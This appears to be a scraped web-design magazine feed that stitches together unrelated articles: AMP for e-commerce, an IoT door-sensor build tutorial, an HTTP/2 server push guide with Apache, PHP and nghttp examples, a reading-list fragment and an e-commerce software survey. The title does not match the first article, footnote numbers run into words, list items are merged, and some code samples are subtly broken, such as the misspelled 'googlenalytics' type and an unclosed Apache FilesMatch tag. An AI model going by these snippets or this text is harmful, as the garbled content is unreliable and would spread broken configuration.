A Comprehensive Guide To HTTP/2 Server Push
Jeremy Wagner’s complete guide to HTTP/2 Server Push, what it is and how to use it.
Jeremy Wagner’s complete guide to HTTP/2 Server Push, what it is and how to use it.
Big news from Google: Within a few months, the infamous search engine will divide its index1 to give users better and fresher content. The long-term plan is to make the mobile search index the primary one. Why does this matter for e-commerce website owners?
Well, it will enable Google to run its ranking algorithm differently for purely mobile content. This means that mobile content won’t be extracted from desktop content to determine mobile rankings. That’s definitely something that retailers can leverage, thanks to AMP. This article outlines how to get started with AMP and how to gain an edge over the competition with your e-commerce website.
So, how do online retailers go about leveraging this big Google announcement? With AMP content! AMP (Accelerated Mobile Pages) just celebrated its one-year anniversary. It is an open-source project supported by Google that aims to reduce page-loading times on mobile. AMP pages are similar to HTML pages, with a few exceptions: Some tags are different, some rules are new, and there are plenty of restrictions on the use of JavaScript and CSS.
AMP pages get their own special carousel in Google mobile search results. No official statement has been made yet about whether these AMP pages will be getting an SEO boost.
While initially geared to blogs and news websites, AMP has introduced components that make it easy to adapt to an e-commerce website. To date, more than 150 million AMP documents are in Google’s index, with over 4 million being added every week. AMP isn’t meant purely for mobile traffic; it renders well on mobile, tablet and desktop. The AMP project’s website9 is actually coded in AMP HTML, in case you are curious to see what AMP looks like on a desktop. eBay was one of the most notable early adopters in the e-commerce realm; by July 2016, it took more than 8 million product pages live in AMP format and plans on going further.
Google is touting a reduction of 15 to 85% in page-loading time on mobile. The main advantage of AMP for retailers is that slow loading times kill conversions. Selling products to people when they want them makes a huge difference to a business’ bottom line. Many shoppers will go to a competitor’s website if yours is too slow to load. Put that in a mobile context, and a slow loading time means losing 40% of visitors — potential customers who will take their dollars elsewhere.
In brick and mortar stores, shop fronts are a big deal in attracting customers. It’s the same online, except that your storefront is supported by the speed of your customers’ Internet connection and the visibility you get on various channels (such as search engines, social media and email). Visibility is another way retailers can leverage AMP. Visibility is also a major element of the AMP equation. This is especially true in countries with limited mobile broadband speed10. And before you think this particular challenge is exclusive to developing nations, keep in mind that the US is not ranked in the top 10 countries in mobile broadband speed.
AMP pages feel like they load blazingly fast. Here’s a comparison:
User experience is central to most online retailers. A slow website with bloated code, an overwrought UI and plenty of popups is everyone’s nightmare, especially on a mobile device.
The “mobile-friendly” label was introduced by Google in late 2014 as an attempt to encourage websites to ensure a good mobile user experience. After widespread adoption of responsive design, the mobile-friendly label is being retired by Google in favor of the AMP label.
11AMP pages could be featured in a carousel and are labelled with a dedicated icon, highlighting them in search results. The search giant has recently stated that AMP would take precedence over other mobile-friendly alternatives such as in-app indexing. However, AMP is still not a ranking signal13, according to Google Webmaster Trends analyst John Mueller.
Media queries adapt the presentation of content to the device. However, the content of the page itself isn’t affected. In contrast, AMP helps make mobile web pages truly fast to load, but at a cost. Developers, designers and marketers will have to learn how to create beautiful web pages that convert using a subset of HTML with a few extensions.
The premise of AMP14 is that mobile-optimized content should load instantly anywhere. It’s a very accessible framework for creating fast-loading mobile web pages. However, compatibility with the AMP format is not guaranteed for all types of websites. This is one of the realities of a constantly evolving project such as AMP. The good news is that many of the arguments against AMP for online retailers no longer hold up.
AMP pages are now able to handle e-commerce analytics thanks to the amp-analytics variable. With this variable, statistics are available to analyze an AMP page’s performance in terms of traffic, revenue generated, clickthrough rate and bounce rate. According to the AMP project’s public roadmap15, better mobile payments are planned, after the addition of login-based access, slated for the fourth quarter of 2016.
Product and listing pages are supported in AMP, and they show great potential to add real value to the online customer journey. Keep in mind that 40% of users will abandon a website if it takes longer than 3 seconds to load16. Worse yet, 75% of consumers would rather visit a competitor website than deal with a slow-loading page.
Some of the drawbacks that have been noted are mostly due to the fact that AMP for e-commerce is rather new. There are a few concerns about the quality of the user experience offered by AMP e-commerce pages because some e-commerce functionality is not yet available, such as search bars, faceted search filters, login and cart features. However, frequent updates to the AMP format are planned, so this shouldn’t be a deterrent to those looking to implement it.
17There has been some grumbling about the format among marketers. AMP relies on simplified JavaScript and CSS. As a consequence, tracking and advertising on AMP pages is less sophisticated than on traditional HTML pages. That being said, the main drawback is that implementing AMP pages effectively will take time and effort. The code is proprietary, heavily restricts JavaScript (iframes are not allowed, for example) and even limits CSS (with some properties being outright banned).
To ensure that your website is AMP-compliant20, check the instructions provided in the AMP project’s documentation21. Keep in mind that AMP pages should be responsive22 or mobile-friendly. A best practice would be to test the implementation of AMP pages against your current mobile website using a designated subset of pages. This will give you a sample to determine whether AMP adds value to your business.
You don’t have to make your entire website AMP-compliant. Start upgrading the website progressively: Pick simple static-content pages first, such as product pages, and then move on to other types of content. This way, you can target highly visible pages in SEO results, which will lead to a big payoff for the website without your having to deal with pages that require advanced functionality not yet supported by AMP.
If your website uses a popular CMS, then becoming AMP-compliant could be as easy as installing a plugin.
Let’s break down the process according to the customer journey. AMP offers a selection of prebuilt components to help you craft an enjoyable user experience on an e-commerce website (along with some evolving tools to help you collect data in order to improve it). You can implement four major AMP elements along key points in the customer’s purchasing journey, including on the home page, browsing pages, landing pages, product pages and related product widgets:
The entire purchasing flow can’t be 100% AMP-compliant yet, so you’ll have to plan a gateway to a regular non-AMP page for ordering and completing purchases.
Users will often start their purchasing journey on a website’s home page or a product category page, because these pages are prominent in search engine results. These pages are great candidates for AMP, as eBay has shown25 by making many of its category pages AMP-compliant. Typically, category pages are static and showcase products for sale. The amp-carousel feature26 offers a way to browse other products in a mobile-optimized way. These products can be organized into subcategories that fit the user’s needs. You can view the annotated code to create a product page over on AMP by Example27.
28After browsing to a category page, the next step for our user would be to find an interesting product and click on it. In an AMP-compliant flow, this would lead the user to an AMP product page29.
30Your AMP product page could include the following:
amp-carousel31 and amp-video elements32;amp-accordion tag33 and which enable the user to easily share the product’s URL via the amp-social-share element34;amp-sidebar35.Here is a preview of what the AMP carousel looks like on mobile:
Showing related products36 benefits the retailer’s bottom line and the user’s experience. The first product that a user browses to isn’t always the one that fits their need. You can show related products in AMP in two ways:
amp-list37 to fire a CORS request to a JSON endpoint that supplies the list of related products. These related products can be populated in an amp-mustache4138 template on the client. This approach is personalized because the content is dynamically generated server-side for each request.Personalization is a big deal in e-commerce because it increases conversions. To dip into personalization in the AMP format, you can leverage the amp-access39 component to display different blocks of content according to the user’s status. To make it all work, you have to follow the same method as we did with the amp-list40 component: Fire a request at a JSON endpoint, and then present the data in an amp-mustache4138 template. Keep in mind that personalization doesn’t have a leg to stand on without reliable data. Google has been actively extending the tracking options available in AMP.
You can track users at an aggregate level using the amp-analytics component6242; AMP supports several analytics vendors.43
Sidenote: In case you see cdn.ampproject.org in your Google Analytics data, this is normal for AMP pages; cdn.ampproject.org is a cache that belongs to Google. No need to worry about this strange newcomer to your Google Analytics data!
AMP now supports some analytics products, such as Adobe’s and Google’s own. The type attribute will quickly configure the respective product within the code. Here’s an example of type being used for Google Analytics:
<amp-analytics type="googlenalytics">
And here are the types for some of the most common analytics vendors:
adobeanalyticsgoogleanalyticssegmentwebtrekkmetrikaGoogle Tag Manager44 has taken AMP support one step further with AMP containers. You can now create a container for your AMP pages.
45More than 20 tag types are available out of the box, including third-party vendor tags. Alongside a wider selection of tags, Google has provided built-in variables dedicated to AMP tracking, making it easier for marketers and developers to tag their pages.
If you are not using Google Tag Manager, you can implement your tag management service in one of two ways:
amp-analytics and conducts marketing management in the back end.The endpoint approach is the same as the standard approach. The config approach consists of creating a unique configuration for amp-analytics that is specific to each publisher and that includes all of the publisher’s compatible analytics packages. A publisher would configure using a syntax like this:
<amp-analytics config="https://your-dream-tag-manager.example.com/user-id.json">
Many online retailers rely on advertising or showing related products throughout their website to boost revenue. The AMP format is bootstrapped to show ads through <amp-ad> and <amp-embed>. The documentation is quite clear47 on how to implement ads, and the good news is that a wide variety of networks are already supported. Although iframes are not allowed in AMP, two embed types support ads with <amp-embed>: Taboola and Zergnet. If you plan on using ads in AMP, follow these principles48 in your development work:
The previous step was a tricky one because it entails maintaining a seamless user experience while the user transitions to a full HTML page. The process should be fast and consistent for the user. An experience that isn’t consistent with the preceding AMP journey could hurt conversions. If your website is a progressive web app, then amp-install-serviceworker49 is an ideal way to bridge both types of pages within the customer journey, because it allows your AMP page to install a service worker on your domain, regardless of where the user is viewing the AMP page. This means that caching content from your progressive web app can be done preemptively to ensure that the transition is smooth for the customer, because all of the content needed is cached in advance. An easy way to experience the entire AMP e-commerce experience is to head on over to eBay50; see how the company handles the transition from AMP to an HTML checkout process.
AMP works within a smart caching model that enables platforms that refer traffic to AMP pages to use caching and prerendering in order to load web pages super-fast. Be aware of this when analyzing traffic and engagement because you might see less traffic to your own origin when AMP pages are originally hosted (this is why we referred to cdn.ampproject.org in Google Analytics data). The balance of traffic will most likely show up through proxied versions of your pages served by AMP caches.
52A whole host of useful resources are available if you have any questions:
eBay has shared its experience57 in implementing AMP for its own e-commerce platform:
Mind you, there are some complex parts:
amp-analytics component6242. The component can be configured in various ways, but it is still not sufficient for the granular tracking needs of most online retailers.However, once you get past the internal hurdles, the payoff can be great. Check out the examples provided by eBay for camera drones63 and the Sony PlayStation64. (Use a mobile device, of course, otherwise you will be redirected to the desktop version.)
SEO experts are pushing for AMP adoption because some see it as a mobile-visibility asset to be leveraged. Here are some SEO points to ensure you get the most out of AMP:
<link rel="canonical" href="[canonical URL]" /> tag on the AMP page and <link rel="amphtml" href="[AMP URL]" /> on the regular page. For a standalone AMP page (one that doesn’t have a non-AMP version), specify it as the canonical version: <link rel="canonical" href="https://www.example.com/url/to/amp-document.html" />./amp/ to the path of the URL.An e-commerce website can’t be 100% compliant with AMP, but there are benefits to adopting the format early on. Online retailers looking for an edge against fierce competition might be wise to turn to this format to grab the attention of mobile customers and nudge open their wallets. More and more websites are converting to the AMP format to increase or maintain their mobile traffic. For an online retailer that has a multi-channel or mobile-first strategy to acquire and retain customers, AMP might be a great way to future-proof their online marketing efforts.
(da, vf, al, yk, il)
The world is constantly evolving with frameworks, such as the Internet of Things (IoT) and virtual reality (VR). These and many others are opening opportunities to rethink how we approach prototyping: They introduce avenues to marry the digital software with the tangible aspect of the overall user engagement.
This two-article series will introduce readers of different backgrounds to prototyping IoT experiences with minimum code knowledge, starting with affordable proof of concept platforms, before moving to costly commercial offerings.
We will do this by going over a personal experience I had as a user experience designer while learning the basics of an IoT platform named “Adafruit IO”. This will be a nice introductory case study.
The following are some assumptions about you:
Disclaimer:I am not an electronics engineer or a developer. Please always be careful when exploring electricity and hardware. This tutorial is meant to inspire you to do additional research before finding what works for your circumstances!
If this sounds appealing, let’s dive into part 1!
IoT talk is sometimes unnecessary complex. To reduce the jargon, I will use some reader-friendly terms, as defined below.
On a cold winter day, I read an article on smart homes being the future, which immediately inspired me to turn my home into a smart one. This translated into several commercial product purchases, including devices from the Nest family, which just whet my appetite.
Controlling my air conditioning and furnace and detecting possible carbon monoxide emissions were not enough! I wanted to go further by having monitoring capabilities over my home security. This includes:
Getting to the point of picking Adafruit IO as the solution was not a simple journey. Before deciding on that platform and the HUZZAH ESP8266 board, I tried several other solutions, with varying success:
My vision was to have multiple sensors that could be viewed and controlled from a computer or mobile device independently at any time. To accomplish this, I needed both a Wi-Fi-enabled hardware board and a software platform that could talk to it and any attached sensors.
I decided to be more strategic in my choices, so I came up with a list of criteria, in order of priority:
After exploring the three approaches mentioned further above, I ruled out the following additional equipment, based on the five criteria. Keep in mind that I am giving you the high-level details — a whole article could be written on selecting a board!
| Board | What it is | Why I ruled it out |
|---|---|---|
| Arduino Yun10 | Offers both wired and wireless Internet connectivity, expandable RAM and onboard memory. The board has a Linux-based distribution, making it a powerful networked computer. | The price of the controller ($69) and the bulky size proved to be too limiting. Also, I didn’t need something so powerful. I ended up buying one to test out for a garden watering project. |
| Raspberry Pi 3 Model B11 | In addition to offering wired and wireless connectivity, it has HDMI and audio ports, Bluetooth integration and support for use of a custom-sized SD card with different operating systems. | While I could load a Linux-based operating system and use the Python language to accomplish anything, that’s not what I needed. I ended up using this platform for other projects. The $40 price tag and the bulky size were also limiting factors. |
| Raspberry Pi Zero12 | This $5 board packs a big punch. The powerful CPU and large RAM made it a strong contender, as did the small size and large number of GPIO pins. | Two things nixed this board. It doesn’t have on-board Wi-Fi, and so requires additional equipment. And because it is very popular, finding this board is hard. In the US, it is sold only at Micro Center13, which limits it to one per home per month. (Note: At the time of writing v1.3 of the board with on board Wi-Fi and Bluetooth was not yet available.) |
Side note: For more information on choosing a board for your hardware prototyping project, you can consult the excellent “Makers’ Guide to Boards14.”
Further researching led me to Adafruit’s HUZZAH ESP826615 board, which is but one variation of the ESP8266 chipset; there are others, such as the NodeMCU LUA16. Each has unique capabilities, so choose wisely. Here is why I selected the HUZZAH:
Deciding to start small, I wanted to build a sensor that tracks whether a door is open. The rest of this first article will focus on the hardware for this use case, but much of the wiring will scale to other types of sensors.
The following I am assuming you having just laying around: a computer, a solder wire and a solder iron cleaner.
Total: $30 to $40 on average (using US parts)
Before getting to the details of how to put the rig together, let’s talk about what the goal is. By the end of this first article, you should have something similar to what you see below. With this setup, you will have a mini-computer (the board) capable of collecting sensor data from your environment and communicating it to the cloud (Adafruit IO) over Wi-Fi.

The first step is to assemble the HUZZAH board by soldering on its pin headers, including both the board leg headers and the FTDI header. Adafruit has a step-by-step tutorial30 on this.
When you are soldering the first leg header, ensure that the board is not tilting one way, which would result in the pins being soldered at an angle. A trick I used is to put a bit of putty under the board to even it out as it is being plugged into the breadboard.
Once you have soldered all of the headers, insert the board in the breadboard with the antenna (the wavy gold line) facing outwards.
Insert the supply at the opposite end of the breadboard, with the top and bottom legs fitting in the + and – breadboard rails. This is how power will be passed to the breadboard.
Next, set the yellow jumpers for both rails to 3.3 volts, which is the voltage used by the HUZZAH board.
Note: Depending on your breadboard, the – and + might not match the alignment of the power supply jumpers. That’s fine as long as you remember that the power supply dictates which breadboard rail carries which electrical signal!
Connect the HUZZAH board to the power:
Connecting the sensor is very easy:



If you are curious to learn how reed switches operate, Chris Woodford has more information34 on the subject.
As a last step, plug the 9-volt adapter into a power outlet, then into the breadboard power supply. Push the white button. If everything is correctly wired, you should see several lights flicker on, including for the power supply (the green one), the board power (red), the Wi-Fi (blue) and the sensor (red if the magnet is touching the sensor).
At this point, you can start writing the code for the rig, but I find this is a good opportunity to test the mounting of the container box. This is not a permanent mounting, but a trial run to gauge the rig’s overall dimensions and the best fit. Before doing that, you need to take some steps first.
Step 1: Using your soldering iron, melt one hole in the left side of the container for the power adapter plug, and three smaller ones on the right for the individual sensor wires.
Warning: Make sure to do this in a well-ventilated area, so that you don’t breathe in fumes. After that, clean your soldering iron’s tip with a nonabrasive sponge.


Step 2: Put the entire rig in the container, and pass the cables through the holes.

Step 3: Close the container, and mount it on the wall with the putty. Tapes of various types won’t work well. Alternatively, you could punch holes in the bottom of the container to mount with screws, but make sure they are insulated with electrical tape to avoid short-circuiting any electronics.
I have also tried using hot glue. I think it is messy, but it is not all that more expensive, and you can pick one up on the cheap38 if you prefer that method.


Step 4: Use a combination of LEGO pieces and putty to mount the sensor and the accompanying magnet to the door.

Now that the rig is all wired up, you can connect to it with the FTDI cable and start adding the code that will make the sensor work.
In this first article of our two-part series, we’ve identified the problem (home security), assessed the merit of an IoT setup, and discussed the rationale involved in selecting a particular board. This was followed by a step-by-step guide on how to put together all of the hardware components into a working rig.
In doing so, we’ve learned the basics of electronics. In the second and final article in this series, we will add code to the rig we’ve built here, so that we can start interacting with the environment. Then, we will build custom user interfaces to view the data from anywhere, while discussing at a high level the security implications of the software configuration.
Stay tuned!
(da, vf, al, il)
JavaScript Basics course * Boilrplate * LabWorm * The History of the Web * React Conf 2017 * AutoDraw * Griddy…
The landscape for the performance-minded developer has changed significantly in the last year or so, with the emergence of HTTP/2 being perhaps the most significant of all. No longer is HTTP/2 a feature we pine for. It has arrived, and with it comes server push!
Aside from solving common HTTP/1 performance problems (e.g., head of line blocking and uncompressed headers), HTTP/2 also gives us server push! Server push allows you to send site assets to the user before they’ve even asked for them. It’s an elegant way to achieve the performance benefits of HTTP/1 optimization practices such as inlining, but without the drawbacks that come with that practice.
In this article, you’ll learn all about server push, from how it works to the problems it solves. You’ll also learn how to use it, how to tell if it’s working, and its impact on performance. Let’s begin!
Accessing websites has always followed a request and response pattern. The user sends a request to a remote server, and with some delay, the server responds with the requested content.
The initial request to a web server is commonly for an HTML document. In this scenario, the server replies with the requested HTML resource. The HTML is then parsed by the browser, where references to other assets are discovered, such as style sheets, scripts and images. Upon their discovery, the browser makes separate requests for those assets, which are then responded to in kind.
The problem with this mechanism is that it forces the user to wait for the browser to discover and retrieve critical assets until after an HTML document has been downloaded. This delays rendering and increases load times.
With server push, we have a solution to this problem. Server push lets the server preemptively “push” website assets to the client without the user having explicitly asked for them. When used with care, we can send what we know the user is going to need for the page they’re requesting.
Let’s say you have a website where all pages rely on styles defined in an external style sheet named styles.css. When the user requests index.html from the server, we can push styles.css to the user just after we begin sending the response for index.html.
3Rather than waiting for the server to send index.html and then waiting for the browser to request and receive styles.css, the user only has to wait for the server to respond with bothindex.html and styles.css on the initial request. This means that the browser can begin rendering the page faster than if it had to wait.
As you can imagine, this can decrease the rendering time of a page. It also solves some other problems, particularly in front-end development workflows.
While reducing round trips to the server for critical content is one of the problems that server push solves, it’s not the only one. Server push acts as a suitable alternative for a number of HTTP/1-specific optimization anti-patterns, such as inlining CSS and JavaScript directly into HTML, as well as using the data URI scheme5 to embed binary data into CSS and HTML.
These techniques found purchase in HTTP/1 optimization workflows because they decrease what we call the “perceived rendering time” of a page, meaning that while the overall loading time of a page might not be reduced, the page will appear to load faster for the user. It makes sense, after all. If you inline CSS into an HTML document within <style> tags, the browser can begin applying styles immediately to the HTML without waiting to fetch them from an external source. This concept holds true with inlining scripts and inlining binary data with the data URI scheme.

Seems like a good way to tackle the problem, right? Sure — for HTTP/1 workflows, where you have no other choice. The poison pill we swallow when we do this, however, is that the inlined content can’t be efficiently cached. When an asset like a style sheet or JavaScript file remains external and modular, it can be cached much more efficiently. When the user navigates to a subsequent page that requires that asset, it can be pulled from the cache, eliminating the need for additional requests to the server.
7When we inline content, however, that content doesn’t have its own caching context. Its caching context is the same as the resource it’s inlined into. Take an HTML document with inlined CSS, for instance. If the caching policy of the HTML document is to always grab a fresh copy of the markup from the server, then the inlined CSS will never be cached on its own. Sure, the document that it’s a part of may be cached, but subsequent pages containing this duplicated CSS will be downloaded repeatedly. Even if the caching policy is more lax, HTML documents typically have limited shelf life. This is a trade-off that we’re willing to make in HTTP/1 optimization workflows, though. It does work, and it’s quite effective for first-time visitors. First impressions are often the most important.
These are the problems that server push addresses. When you push assets, you get the practical benefits that come with inlining, but you also get to keep your assets in external files that retain their own caching policy. There is a caveat to this point, though, and it’s covered toward the end of this article. For now, let’s continue.
I’ve talked enough about why you should consider using server push, as well as the problems that it fixes for both the user and the developer. Now let’s talk about how it’s used.
Using server push usually involves using the Link HTTP header, which takes on this format:
Link: </css/styles.css>; rel=preload; as=style
Note that I said usually. What you see above is actually the preload resource hint9 in action. This is a separate and distinct optimization from server push, but most (not all) HTTP/2 implementations will push an asset specified in a Link header containing a preload resource hint. If either the server or the client opts out of accepting the pushed resource, the client can still initiate an early fetch for the resource indicated.
The as=style portion of the header is not optional. It informs the browser of the pushed asset’s content type. In this case, we use a value of style to indicate that the pushed asset is a style sheet. You can specify other content types10. It’s important to note that omitting the as value can result in the browser downloading the pushed resource twice. So don’t forget it!
Now that you know how a push event is triggered, how do we set the Link header? You can do so through two routes:
httpd.conf or .htaccess);header function).Link Header in Your Server Configuration LinkHere’s an example of configuring Apache (via httpd.conf or .htaccess) to push a style sheet whenever an HTML file is requested:
<FilesMatch ".html$"> Header set Link "</css/styles.css>; rel=preload; as=style" <FilesMatch>
Here, we use the FilesMatch directive to match requests for files ending in .html. When a request comes along that matches this criteria, we add a Link header to the response that tells the server to push the resource at /css/styles.css.
Side note: Apache’s HTTP/2 module can also initiate a push of resources using the H2PushResource directive. The documentation for this directive states that this method can initiate pushes earlier than if the Link header method is used. Depending on your specific setup, you may not have access to this feature. The performance tests shown later in this article use the Link header method.
As of now, Nginx doesn’t support HTTP/2 server push, and nothing so far in the software’s changelog11 has indicated that support for it has been added. This may change as Nginx’s HTTP/2 implementation matures.
Link Header in Back-End Code LinkAnother way to set a Link header is through a server-side language. This is useful when you aren’t able to change or override the web server’s configuration. Here’s an example of how to use PHP’s header function to set the Link header:
header("Link: </css/styles.css>; rel=preload; as=style");
If your application resides in a shared hosting environment where modifying the server’s configuration isn’t an option, then this method might be all you’ve got to go on. You should be able to set this header in any server-side language. Just be sure to do so before you begin sending the response body, to avoid potential runtime errors.
All of our examples so far only illustrate how to push one asset. What if you want to push more than one? Doing that would make sense, right? After all, the web is made up of more than just style sheets. Here’s how to push multiple assets:
Link: </css/styles.css>; rel=preload; as=style, </js/scripts.js>; rel=preload; as=script, </img/logo.png>; rel=preload; as=image
When you want to push multiple resources, just separate each push directive with a comma. Because resource hints are added via the Link tag, this syntax is how you can mix in other resource hints with your push directives. Here’s an example of mixing a push directive with a preconnect resource hint:
Link: </css/styles.css>; rel=preload; as=style, <https://fonts.gstatic.com>; rel=preconnect
Multiple Link headers are also valid. Here’s how you can configure Apache to set multiple Link headers for requests to HTML documents:
<FilesMatch ".html$"> Header add Link "</css/styles.css>; rel=preload; as=style" Header add Link "</js/scripts.js>; rel=preload; as=script" <FilesMatch>
This syntax is more convenient than stringing together a bunch of comma-separated values, and it works just the same. The only downside is that it’s not quite as compact, but the convenience is worth the few extra bytes sent over the wire.
Now that you know how to push assets, let’s see how to tell whether it’s working.
So, you’ve added the Link header to tell the server to push some stuff. The question that remains is, how do you know if it’s even working?
This varies by browser. Recent versions of Chrome will reveal a pushed asset in the initiator column of the network utility in the developer tools.
Furthermore, if we hover over the asset in the network request waterfall, we’ll get detailed timing information on the asset’s push:
14Firefox is less obvious in identifying pushed assets. If an asset has been pushed, its status in the browser’s network utility in the developer tools will show up with a gray dot.
If you’re looking for a definitive way to tell whether an asset has been pushed by the server, you can use the nghttp command-line client18 to examine a response from an HTTP/2 server, like so:
nghttp -ans https://jeremywagner.me
This command will show a summary of the assets involved in the transaction. Pushed assets will have an asterisk next to them in the program output, like so:
id responseEnd requestStart process code size request path 13 +50.28ms +1.07ms 49.21ms 200 3K / 2 +50.47ms * +42.10ms 8.37ms 200 2K /css/global.css 4 +50.56ms * +42.15ms 8.41ms 200 157 /css/fonts-loaded.css 6 +50.59ms * +42.16ms 8.43ms 200 279 /js/ga.js 8 +50.62ms * +42.17ms 8.44ms 200 243 /js/load-fonts.js 10 +74.29ms * +42.18ms 32.11ms 200 5K /img/global/jeremy.png 17 +87.17ms +50.65ms 36.51ms 200 668 /js/lazyload.js 15 +87.21ms +50.65ms 36.56ms 200 2K /img/global/book-1x.png 19 +87.23ms +50.65ms 36.58ms 200 138 /js/debounce.js 21 +87.25ms +50.65ms 36.60ms 200 240 /js/nav.js 23 +87.27ms +50.65ms 36.62ms 200 302 /js/attach-nav.js
Here, I’ve used nghttp on my own website19, which (at least at the time of writing) pushes five assets. The pushed assets are marked with an asterisk on the left side of the requestStart column.
Now that we can identify when assets are pushed, let’s see how server push actually affects the performance of a real website.
Measuring the effect of any performance enhancement requires a good testing tool. Sitespeed.io20 is an excellent tool available via npm21; it automates page testing and gathers valuable performance metrics. With the appropriate tool chosen, let’s quickly go over the testing methodology.
I wanted measure the impact of server push on website performance in a meaningful way. In order for the results to be meaningful, I needed to establish points of comparison across six separate scenarios. These scenarios are split across two facets: whether HTTP/2 or HTTP/1 is used. On HTTP/2 servers, we want to measure the effect of server push on a number of metrics. On HTTP/1 servers, we want to see how asset inlining affects performance in the same metrics, because inlining is supposed to be roughly analogous to the benefits that server push provides. Specifically, these scenarios are the following:
In each scenario, I initiated testing with the following command:
sitespeed.io -d 1 -m 1 -n 25 -c cable -b chrome -v https://jeremywagner.me
If you want to know the ins and outs of what this command does, you can check out the documentation24. The short of it is that this command tests my website’s home page at https://jeremywagner.me25 with the following conditions:
Three metrics were collected and graphed from each test:
async attribute on <script> tags can help to prevent parser blocking.With the parameters of the test determined, let’s see the results!
Tests were run across the six scenarios specified earlier, with the results graphed. Let’s start by looking at how first paint time is affected in each scenario:
26Let’s first talk a bit about how the graph is set up. The portion of the graph in blue represents the average first paint time. The orange portion is the 90th percentile. The grey portion represents the maximum first paint time.
Now let’s talk about what we see. The slowest scenarios are both the HTTP/2- and HTTP/1-driven websites with no enhancements at all. We do see that using server push for CSS helps to render the page about 8% faster on average than if server push is not used at all, and even about 5% faster than inlining CSS on an HTTP/1 server.
When we push all assets that we possibly can, however, the picture changes somewhat. First paint times increase slightly. In HTTP/1 workflows where we inline everything we possibly can, we achieve performance similar to when we push assets, albeit slightly less so.
The verdict here is clear: With server push, we can achieve results that are slightly better than what we can achieve on HTTP/1 with inlining. When we push or inline many assets, however, we observe diminishing returns.
It’s worth noting that either using server push or inlining is better than no enhancement at all for first-time visitors. It’s also worth noting that these tests and experiments are being run on a website with small assets, so this test case may not reflect what’s achievable for your website.
Let’s examine the performance impacts of each scenario on DOMContentLoaded time:
28The trends here aren’t much different than what we saw in the previous graph, except for one notable departure: The instance in which we inline as many assets as practical on a HTTP/1 connection yields a very low DOMContentLoaded time. This is presumably because inlining reduces the number of assets needed to be downloaded, which allows the parser to go about its business without interruption.
Now, let’s look at how page-loading times are affected in each scenario:
30The established trends from earlier measurements generally persist here as well. I found that pushing only the CSS realized the greatest benefit to loading time. Pushing too many assets could, on some occasions, make the web server a bit sluggish, but it was still better than not pushing anything at all. Compared to inlining, server push yielded better overall loading times than inlining did.
Before we conclude this article, let’s talk about a few caveats you should be aware of when it comes to server push.
Server push isn’t a panacea for your website’s performance maladies. It has a few drawbacks that you need to be cognizant of.
In one of the scenarios above, I am pushing a lot of assets, but all of them altogether represent a small portion of the overall data. Pushing a lot of very large assets at once could actually delay your page from painting or being interactive sooner, because the browser needs to download not only the HTML, but all of the other assets that are being pushed alongside of it. Your best bet is to be selective in what you push. Style sheets are a good place to start (so long as they aren’t massive). Then evaluate what else makes sense to push.
This is not necessarily a bad thing if you have visitor analytics to back up this strategy. A good example of this may be a multi-page registration form, where you push assets for the next page in the sign-up process. Let’s be crystal clear, though: If you don’t know whether you should force the user to preemptively load assets for a page they haven’t seen yet, then don’t do it. Some users might be on restricted data plans, and you could be costing them real money.
Some servers give you a lot of server push-related configuration options. Apache’s mod_http2 has some options for configuring how assets are pushed. The H2PushPriority setting32 should be of particular interest, although in the case of my server, I left it at the default setting. Some experimentation could yield additional performance benefits. Every web server has a whole different set of switches and dials for you to experiment with, so read the manual for yours and find out what’s available!
There has been some gnashing of teeth over whether server push could hurt performance in that returning visitors may have assets needlessly pushed to them again. Some servers do their best to mitigate this. Apache’s mod_http2 uses the H2PushDiarySize setting33 to optimize this somewhat. H2O Server has a feature called Cache Aware server push34 that uses a cookie mechanism to remember pushed assets.
If you don’t use H2O Server, you can achieve the same thing on your web server or in server-side code by only pushing assets in the absence of a cookie. If you’re interested in learning how to do this, then check out a post I wrote about it on CSS-Tricks35. It’s also worth mentioning that browsers can send an RST_STREAM frame to signal to a server that a pushed asset is not needed. As time goes on, this scenario will be handled much more gracefully.
As sad it may seem, we’re nearing the end of our time together. Let’s wrap things up and talk a bit about what we’ve learned.
If you’ve already migrated your website to HTTP/2, you have little reason not to use server push. If you have a highly complex website with many assets, start small. A good rule of thumb is to consider pushing anything that you were once comfortable inlining. A good starting point is to push your site’s CSS. If you’re feeling more adventurous after that, then consider pushing other stuff. Always test changes to see how they affect performance. You’ll likely realize some benefit from this feature if you tinker with it enough.
If you’re not using a cache-aware server push mechanism like H2O Server’s, consider tracking your users with a cookie and only pushing assets to them in the absence of that cookie. This will minimize unnecessary pushes to known users, while improving performance for unknown users. This not only is good for performance, but also shows respect to your users with restricted data plans.
All that’s left for you now is to try out server push for yourself. So get out there and see what this feature can do for you and your users! If you want to know more about server push, check out the following resources:
Thanks to Yoav Weiss39 for clarifying that the as attribute is required (and not optional as the original article stated), as well as a couple of other minor technical issues. Additional thanks goes to Jake Archibald40 for pointing out that the preload resource hint is an optimization distinct from server push.
This article is about an HTTP/2 feature named server push. This and many other topics are covered in Jeremy’s book Web Performance in Action41. You can get it or any other Manning Publications42 book for 42% off with the coupon code sswagner!
(rb, vf, al, il)
The Material Design color tool helps you create, share, and apply color palettes to your UI, as well as measure the accessibility level of any color combination.
From time to time, we need to take some time off, and actually, I’m glad that this reading list is a bit shorter as the ones you’re used to. Because one thing that really stuck with me this week was Eric Karjaluoto’s article.
In his article, he states that, “Taking pride in how busy we are is one of the worst ideas we ever had.” So, how about reading just a few articles this week for a change and then take a complete weekend off to recharge your battery?
Expect-CT. Scott Helme explains when and how you should use it10.
13And with that, I’ll close for this week. If you like what I write each week, please support me with a donation19 or share this resource with other people. You can learn more about the costs of the project here20. It’s available via email, RSS and online.
— Anselm
Did you know that bandwidth overage charges are (still) a problem and most users prefer not to rely on a developer? Well, I talked to 917 (real-life) users and created a guide to help others find the e-commerce software that suits them best.
I completed this guide by searching for websites built with e-commerce software (you can verify by looking at the source code — certain code strings are unique to the software). Once I found a website, I (or one of my virtual assistants) would email the owner and ask if they’d recommend a particular software. Typically, they’d reply and I’d record their response in a spreadsheet (and personally thank them). Occasionally, I would even go on the phone to speak with them directly (although I quickly found out that this took too much time).
Here’s what I discovered.
I calculated customer satisfaction by finding the percentage of active users who recommend the software:
| E-commerce software | Recommendation % |
|---|---|
| Shopify | 98% |
| Squarespace | 94% |
| Big Cartel | 91% |
| WooCommerce | 90% |
| OpenCart | 88% |
| Jumpseller | 86% |
| GoDaddy | 83% |
| CoreCommerce | 80% |
| BigCommerce | 79% |
| Ubercart | 78% |
| Wix | 76% |
| Magento | 74% |
| Weebly | 74% |
| 3dcart | 72% |
| PrestaShop | 70% |
| Goodsie | 65% |
